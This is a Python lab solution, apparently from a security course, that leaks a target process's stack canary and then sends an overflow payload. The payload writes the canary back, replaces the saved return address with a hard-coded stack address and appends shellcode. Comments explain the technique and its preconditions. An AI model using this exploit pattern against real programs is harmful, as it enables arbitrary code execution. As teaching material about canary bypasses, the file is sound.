### YOUR CODE STARTS HERE ###
# Lab solution in two round trips with the target process `p`:
#   1. make the target echo back the bytes of its stack canary;
#   2. send an overflow that writes the same canary value back in place,
#      so the canary check still passes while the return address is replaced.
# A stack canary only protects the saved return address while its value
# stays secret; any output path that reveals it removes that protection.
#
# Author's notes from debugging the target (hard-coded for this lab setup):
#   canary     @ 0xbffff708
#   c.buffer   @ 0xbffff6f4 (ends at 0xbffff704)
#   saved eip  @ 0xbffff710
#
# NOTE(review): nothing here shows how the target is built. Hard-coded stack
# addresses and code placed on the stack only work where stack addresses are
# the same on every run and the stack is executable (ASLR and NX off);
# confirm against the lab environment.

# Round trip 1: twelve filler bytes, then a backslash and 'x', then newline.
leak_probe = 'B' * 12 + "\\x" + '\n'
p.send(leak_probe)

# Read by byte count rather than by line (the earlier p.recvline() attempt
# was dropped; presumably the leaked bytes are binary, TODO confirm).
full_canary = p.recv(17)
print(full_canary)

# The slice discards the first 13 bytes of the reply and keeps the rest;
# with a full 17-byte read that leaves 4 bytes. The author's original note
# describes the discarded part as always ending in '\\x\n\0' (TODO confirm).
canary_stripped = full_canary[13:]
print("Canary:", canary_stripped, len(canary_stripped))

# Debug views of the canary: colon-separated hex, then plain hex text.
# str.encode('hex') exists on Python 2 only.
sp = ":".join(format(ord(ch), "02x") for ch in canary_stripped)
print(sp)
hex_can = canary_stripped.encode('hex')
print(hex_can)

# Decode the hex text back into raw characters, two digits at a time.
# This undoes the encode above, so hex_format holds the same bytes as
# canary_stripped.
hex_format = ''.join(
    chr(int(hex_can[pos:pos + 2], 16))
    for pos in range(0, len(hex_can), 2)
)

# Replacement return address, little-endian 0xbffff714: the word right
# after the saved-eip slot noted above, where the bytes that follow `rip`
# in the payload are written.
rip = '\x14\xf7\xff\xbf'

# Round trip 2. Payload order: NUL + 15 'A's (16 bytes), the leaked canary,
# 4 'B's, the replacement return address, SHELLCODE, newline.
buffer_fill = '\x00' + 'A' * 15
dat_string = buffer_fill + hex_format + 'B' * 4 + rip + SHELLCODE + '\n'
print(dat_string)  # raw payload bytes; mostly non-printable on a terminal
p.send(dat_string)

# Scaffold text kept by the author, disabled by wrapping it in a bare string.
'''
# Example receive:
assert p.recvline() == 'testA'
# HINT: the last line of your exploit should look something like:
# p.send('A' * m + canary + 'B' * n + rip + SHELLCODE + '\n')
# where m, canary, n and rip are all values you must determine
# and you might need to add a '\x00' somewhere
'''
### YOUR CODE ENDS HERE ###